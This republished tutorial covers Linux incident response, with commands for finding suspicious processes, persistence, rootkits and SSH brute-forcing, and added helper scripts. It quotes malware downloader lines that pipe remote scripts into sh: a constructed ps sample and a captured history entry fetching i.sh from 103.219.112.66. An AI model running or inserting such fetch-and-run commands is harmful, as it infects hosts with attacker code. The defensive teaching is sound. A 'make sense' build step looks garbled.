
What are the emergency response skills of Linux?

2025-03-26 Update From: SLTechnology News&Howtos shulou

Shulou(Shulou.com)06/01 Report--

Many newcomers are unclear about what emergency response on Linux involves. To help with that, this article walks through the process in detail; readers who need it can follow along and hopefully take something away.

Overview

Handling an emergency response event on Linux is often harder than on Windows: there is no equivalent of response tools such as Autoruns or Process Explorer, and there is no unified response procedure.

This article therefore lays out an emergency response process for the Linux environment and gives the shell commands used at each stage, so that malware on a Linux host can be handled quickly and systematically.

Linux emergency response is divided into four stages: identify symptoms -> remove the malware -> close the loop on persistence -> harden the system.

Starting from the abnormal behaviour observed on the host in the user's environment, we first identify the signs of infection, then locate the specific malicious process and its files and remove them.

Completing the first two steps is not enough: malware usually re-infects the host through autostart entries and daemons, so we close the loop to make sure it is not recreated.

After the malicious items on the host have been cleaned up, the system is hardened to prevent a fresh intrusion over the web.

Once these four stages are complete, the emergency response can be considered finished.

Identifying symptoms

The first step is to find abnormal behaviour on the host and confirm suspicious activity from the system's running state and from security device alerts.

Is system CPU usage abnormal?

Enumerate processes, sorted by CPU descending: top

If CPU usage exceeds 70% and the process name is suspicious, it is very likely a cryptominer.

Is there a suspicious process?

Enumerate processes with their command lines: ps aux

Malware usually has a suspicious command line. When you see strange strings such as a URL on the command line, be alert: it is probably a malware downloader.
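The two heuristics above (CPU above 70%, a URL in the command line) can be applied to `ps aux` output mechanically. The following shell script is an added example, not code from the original article; the `ps` output it scans is constructed sample data, and the threshold variable and function name are the example's own:

```sh
# Added example: flag suspicious entries in `ps aux`-style output.
# Heuristics from the text: %CPU above 70 and a URL in the command line.
# Reads ps-formatted lines from stdin, prints "REASON<TAB>line" for each hit.

CPU_THRESHOLD=70   # example's own threshold, taken from the article's 70% rule of thumb

flag_suspicious_ps() {
    # Fields of `ps aux`: USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND...
    awk -v thr="$CPU_THRESHOLD" '
        NR == 1 && $1 == "USER" { next }          # skip the header line
        {
            # Rebuild the command line from field 11 onward (it may contain spaces)
            cmd = ""
            for (i = 11; i <= NF; i++) cmd = cmd (i > 11 ? " " : "") $i
            reasons = ""
            if ($3 + 0 > thr + 0) reasons = "HIGH_CPU"
            if (cmd ~ /https?:\/\/|ftp:\/\//)
                reasons = reasons (reasons ? "," : "") "URL_IN_CMDLINE"
            if (reasons != "") printf "%s\t%s\n", reasons, $0
        }'
}

# Constructed sample `ps aux` output (not captured from a real host;
# 203.0.113.5 is an RFC 5737 documentation address).
SAMPLE_PS='USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1 168000 11000 ?        Ss   10:00   0:01 /sbin/init
root       842  0.1  0.3 900000 25000 ?        Ssl  10:00   0:03 /usr/sbin/rsyslogd -n
nobody    4211 98.7  1.2 500000 90000 ?        Rsl  10:05  55:10 /tmp/.X11-unix/kthreaddk
www-data  4300  0.0  0.1  12000  2000 ?        S    10:06   0:00 sh -c (curl -fsSL http://203.0.113.5/i.sh || wget -q -O- http://203.0.113.5/i.sh) | sh
postgres  1200  3.2  2.0 400000 80000 ?        Ss   10:00   0:20 postgres: writer process'

# Run the check against the constructed sample; on a live host use: ps aux | flag_suspicious_ps
printf '%s\n' "$SAMPLE_PS" | flag_suspicious_ps
```

On the sample this flags the 98.7% CPU process and the `curl ... | sh` downloader and leaves init, rsyslogd and postgres alone; on a live host the same function is fed directly from `ps aux`.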

Is there an alert on the security gateway?

Identifying the threat from a security gateway alert is the most direct route, but confirming that the host is infected is only the first step; next we have to locate which process is communicating with the command-and-control (C2) server.

Monitor processes communicating with the target IP:

while true; do netstat -antp | grep [ip]; done

Sometimes the security gateway reports not an IP address but a domain name. Because the IP a domain resolves to can change, we cannot monitor it directly with the method above.

We can first add an entry to the hosts file (/etc/hosts) that redirects the malicious domain to an arbitrary IP address of our choosing, and then monitor connections to that address.

In this way we obtain the malicious process that is communicating with it.

Are there suspicious commands in the history?

Walk the host's command history to find any malicious commands: history

Removing the malware

The process information traced in the first step lets us locate the malicious process and its files and clean them up.

Kill the malicious process

Clear the process chain of the suspicious process:

ps -elf | grep [pid]
kill -9 [pid]

Delete the malicious files

Locate the file path behind the malicious process:

ls -al /proc/[pid]/exe
rm -f [exe_path]
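One detail worth knowing when following the `/proc/[pid]/exe` link: it keeps pointing at the running image even after malware has deleted its own file from disk, in which case `readlink` reports a " (deleted)" suffix and the image can still be copied out for analysis before the process is killed. The helpers below are an added example for this article, not code from the original; they assume a Linux host with procfs and a procps-style `ps`, and the function names are the example's own.

```sh
# Added example: locate (and preserve) the on-disk binary behind a suspicious PID.

# Print the path /proc/<pid>/exe points to (ends in " (deleted)" if unlinked).
proc_exe_path() {
    readlink "/proc/$1/exe" 2>/dev/null
}

# Return 0 if the process's binary has been deleted from disk.
exe_is_deleted() {
    case "$(proc_exe_path "$1")" in
        *" (deleted)") return 0 ;;
        *)             return 1 ;;
    esac
}

# Copy the running image to $2 for later analysis; works even when the
# original file has been removed, because the kernel still holds it open.
preserve_exe() {
    cp "/proc/$1/exe" "$2"
}

# Show the process chain around a PID (the process, its parent and its children),
# keyed on the PID/PPID columns instead of a free-text `grep [pid]`.
# Assumes procps `ps` (the -o format list is standard there).
process_chain() {
    ps -eo pid,ppid,user,comm,args | awk -v p="$1" 'NR == 1 || $1 == p || $2 == p'
}

# Demo against this shell's own PID (a stand-in for a suspicious [pid]).
echo "exe behind PID $$: $(proc_exe_path $$)"
if exe_is_deleted $$; then echo "binary has been deleted on disk; preserve it before killing"; fi
if command -v ps >/dev/null 2>&1; then process_chain $$; fi
```

In a real case the order is: record the exe path, copy the image out with `preserve_exe`, then kill the process and remove the file; killing first loses the only remaining copy of a self-deleting binary.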

Closing the loop on persistence

Malware on Linux has fewer persistence mechanisms than on Windows; they mainly fall into the following four categories.

Check for suspicious scheduled tasks

Enumerate cron jobs: crontab -l

View anacron asynchronous scheduled tasks: cat /etc/anacrontab

Check for suspicious services

Enumerate all services on the host and look for malicious ones:

service --status-all

Check whether system files have been hijacked

List files in the system binary directories modified within the last 7 days, ordered by modification time:

find /usr/bin/ /usr/sbin/ /bin/ /usr/local/bin/ -type f -mtime -7 | xargs ls -lat

Check for malicious daemons

Monitor a daemon's behaviour: lsof -p [pid]

strace -tt -T -e trace=all -p [pid]

Scan for malicious drivers (kernel modules)

Enumerate the loaded kernel modules: lsmod

Install chkrootkit and scan:

wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
tar zxvf chkrootkit.tar.gz
cd chkrootkit-0.52
make sense
./chkrootkit

Install rkhunter and scan:

wget https://nchc.dl.sourceforge.net/project/rkhunter/rkhunter/1.4.4/rkhunter-1.4.4.tar.gz
tar -zxvf rkhunter-1.4.4.tar.gz
cd rkhunter-1.4.4
./installer.sh --install
rkhunter -c

System hardening

The last step is the one most people forget. 90% of malware on the Linux platform arrives over the network, so in most cases a host is infected because web-facing security protection is lacking; check it promptly.

Change weak SSH passwords

Query the host's login log:

grep "Accepted" /var/log/secure* | awk '{print $1, $2, $3, $9, $11}'

Locate the source IPs of the brute-force attempts:

grep "Failed password" /var/log/secure | grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" | sort | uniq -c

Usernames from the brute-force log (sshd does not log the attempted password itself):

grep "Failed password" /var/log/secure | perl -e 'while ($_ = <>) { /for (.*?) from/; print "$1\n"; }' | sort | uniq -c | sort -nr

SSH brute-forcing is the most common propagation method for Linux malware. If a host with a weak password is brute-forced over SSH by another infected host, it will simply be re-infected.
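The three one-liners above can be turned into reusable functions. The script below is an added example for this article, not code from the original; it runs against a constructed sshd log (addresses from the RFC 5737 documentation ranges) written to a temporary file, and the function names are the example's own. It differs from the one-liners in two ways a practitioner will want: it sorts before `uniq -c` (which only collapses adjacent duplicates), and it pulls the source address from sshd's own `from <ip>` field, which also works for IPv6 peers.

```sh
# Added example: triage of sshd entries in /var/log/secure.

# Count failed logins per source IP, most frequent first.
failed_by_ip() {
    grep 'Failed password' "$1" \
        | sed -nE 's/.* from ([0-9a-fA-F.:]+) port .*/\1/p' \
        | sort | uniq -c | sort -rn
}

# Count failed logins per attempted username, most frequent first.
# sshd prefixes unknown accounts with "invalid user"; strip it so real and
# guessed names are counted the same way.
failed_by_user() {
    grep 'Failed password' "$1" \
        | sed -nE 's/.*Failed password for (invalid user )?([^ ]+) from .*/\2/p' \
        | sort | uniq -c | sort -rn
}

# List successful logins: date, time, user, source IP (fields 1-3, 9 and 11).
accepted_logins() {
    grep 'Accepted' "$1" | awk '{print $1, $2, $3, $9, $11}'
}

# Constructed sample log (not from a real host).
SAMPLE_LOG=$(mktemp)
cat > "$SAMPLE_LOG" <<'EOF'
Oct 28 17:01:02 web01 sshd[2201]: Failed password for root from 198.51.100.7 port 40122 ssh2
Oct 28 17:01:04 web01 sshd[2203]: Failed password for root from 198.51.100.7 port 40130 ssh2
Oct 28 17:01:06 web01 sshd[2205]: Failed password for invalid user admin from 198.51.100.7 port 40138 ssh2
Oct 28 17:02:10 web01 sshd[2210]: Failed password for invalid user oracle from 203.0.113.9 port 51000 ssh2
Oct 28 17:03:15 web01 sshd[2215]: Accepted password for root from 198.51.100.7 port 40150 ssh2
Oct 28 17:05:30 web01 sshd[2220]: Failed password for root from 203.0.113.9 port 51010 ssh2
Oct 28 17:10:00 web01 sshd[2230]: Accepted publickey for deploy from 192.0.2.50 port 60000 ssh2
EOF

echo "== failed logins by source IP =="
failed_by_ip "$SAMPLE_LOG"
echo "== failed logins by username =="
failed_by_user "$SAMPLE_LOG"
echo "== accepted logins =="
accepted_logins "$SAMPLE_LOG"
```

The telling pattern in the sample is the one the text warns about: a burst of failures for root from 198.51.100.7 followed by an accepted password login for root from the same address. On a live host replace `$SAMPLE_LOG` with `/var/log/secure` (or `/var/log/auth.log` on Debian-based systems).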

Add command auditing

Record the login IP address, execution time and so on alongside each history entry:

[1] Keep 10,000 commands:

sed -i 's/^HISTSIZE=1000/HISTSIZE=10000/g' /etc/profile

[2] Append the following configuration to the end of /etc/profile:

USER_IP=`who -u am i 2>/dev/null | awk '{print $NF}' | sed -e 's/[()]//g'`
if [ "$USER_IP" = "" ]
then
  USER_IP=`hostname`
fi
export HISTTIMEFORMAT="%F %T $USER_IP `whoami` "
shopt -s histappend
export PROMPT_COMMAND="history -a"

[3] Apply the configuration:

source /etc/profile

Resulting history entry (as captured in the original, partly truncated):

76  2019-10-28 17 wget -Q -T180 -O- http://103.219.112.66:8000/i.sh) | sh

Patch common web vulnerabilities

Struts2 series RCE vulnerabilities

ThinkPHP 5.x RCE vulnerability

Redis unauthorized access vulnerability

Confluence RCE vulnerability (CVE-2019-3396)

Drupal RCE vulnerability (CVE-2018-7600)

ThinkPHP RCE vulnerability (CVE-2019-9082)

Malware threats on the Linux platform are mainly botnet worms and cryptominers. Because Linux hosts are mostly exposed as servers on the public internet, and web application vulnerabilities keep appearing, they are easy to compromise at scale; families commonly found on many Linux hosts include DDG, systemdMiner, BillGates, watchdogs and XorDDoS. We should get into the habit of not using weak passwords and patching regularly.
